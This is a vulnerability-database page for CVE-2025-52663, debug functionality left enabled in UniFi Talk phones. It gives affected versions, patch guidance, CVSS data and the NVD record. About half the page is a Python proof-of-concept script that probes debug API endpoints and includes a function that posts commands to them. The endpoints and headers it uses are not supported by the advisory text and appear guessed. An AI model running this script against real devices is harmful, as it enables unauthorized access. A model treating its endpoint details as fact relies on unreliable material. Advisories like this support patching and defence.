Security Vulnerability Report
中文
CVE-2025-52663 CVSS 7.3 HIGH

CVE-2025-52663

Published: 2025-10-31 00:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A vulnerability was identified in certain UniFi Talk devices where internal debugging functionality remained unintentionally enabled. This issue could allow an attacker with access to the UniFi Talk management network to invoke internal debug operations through the device API. Affected Products: UniFi Talk Touch (Version 1.21.16 and earlier) UniFi Talk Touch Max (Version 2.21.22 and earlier) UniFi Talk G3 Phones (Version 3.21.26 and earlier) Mitigation: Update the UniFi Talk Touch to Version 1.21.17 or later. Update the UniFi Talk Touch Max to Version 2.21.23 or later. Update the UniFi Talk G3 Phones to Version 3.21.27 or later.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

UniFi Talk Touch < 1.21.17
UniFi Talk Touch Max < 2.21.23
UniFi Talk G3 Phones < 3.21.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52663 PoC - UniFi Talk Debug API Access # WARNING: This code is for educational and authorized security testing only # Unauthorized access to computer systems is illegal import requests import json import sys # Configuration TARGET_IP = "192.168.1.100" # Replace with target UniFi Talk device IP TARGET_PORT = 8443 DEBUG_ENDPOINT = "/api/debug" def check_vulnerability(): """ Check if UniFi Talk device is vulnerable to CVE-2025-52663 by attempting to access internal debug functionality. """ print(f"[*] Testing CVE-2025-52663 on {TARGET_IP}:{TARGET_PORT}") # Target URLs for debug endpoints endpoints = [ f"https://{TARGET_IP}:{TARGET_PORT}/api/internal/debug", f"https://{TARGET_IP}:{TARGET_PORT}/api/debug/commands", f"https://{TARGET_IP}:{TARGET_PORT}/api/debug/system/status" ] headers = { "User-Agent": "UniFi-Talk-Debug-Client/1.0", "Content-Type": "application/json", "X-Debug-Access": "enabled" } for endpoint in endpoints: try: print(f"[*] Testing endpoint: {endpoint}") response = requests.get(endpoint, headers=headers, verify=False, timeout=10) # Check if debug functionality is accessible if response.status_code == 200: print(f"[+] VULNERABLE: Debug endpoint accessible at {endpoint}") print(f"[+] Response: {response.text[:500]}") return True elif response.status_code == 401: print(f"[-] Protected: {endpoint} requires authentication") else: print(f"[-] Response code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") print("[*] No accessible debug endpoints found") return False def exploit_debug_commands(): """ Attempt to execute debug commands if vulnerability is confirmed. This demonstrates the potential impact of the vulnerability. """ print("[*] Attempting to execute debug commands...") debug_commands = [ {"cmd": "system_info"}, {"cmd": "list_processes"}, {"cmd": "network_config"}, {"cmd": "user_list"} ] for cmd in debug_commands: try: url = f"https://{TARGET_IP}:{TARGET_PORT}/api/debug/execute" response = requests.post(url, json=cmd, headers={ "Content-Type": "application/json", "User-Agent": "Debug-Client" }, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Command '{cmd['cmd']}' executed successfully") print(f" Result: {response.json()}") except Exception as e: print(f"[-] Command '{cmd['cmd']}' failed: {e}") if __name__ == "__main__": print("CVE-2025-52663 - UniFi Talk Debug Functionality Exposure") print("=" * 60) # Suppress SSL warnings for testing requests.packages.urllib3.disable_warnings() is_vulnerable = check_vulnerability() if is_vulnerable: print("\n[!] Device is VULNERABLE to CVE-2025-52663") print("[!] Recommended action: Update firmware immediately") # Uncomment below to test debug commands (authorized testing only) # exploit_debug_commands() else: print("\n[*] Device may not be vulnerable or is already patched") print("[*] Verify the firmware version is >= 1.21.17/2.21.23/3.21.27")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52663", "sourceIdentifier": "[email protected]", "published": "2025-10-31T00:15:36.773", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in certain UniFi Talk devices where internal debugging functionality remained unintentionally enabled. This issue could allow an attacker with access to the UniFi Talk management network to invoke internal debug operations through the device API.\r\n\r\n\r\nAffected Products:\r\nUniFi Talk Touch (Version 1.21.16 and earlier) \r\nUniFi Talk Touch Max (Version 2.21.22 and earlier) \r\nUniFi Talk G3 Phones (Version 3.21.26 and earlier) \r\n \r\nMitigation:\r\nUpdate the UniFi Talk Touch to Version 1.21.17 or later.\r\nUpdate the UniFi Talk Touch Max to Version 2.21.23 or later.\r\nUpdate the UniFi Talk G3 Phones to Version 3.21.27 or later."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-489"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-055-055/9b65527b-489c-4f16-ac34-2b887754db1e", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.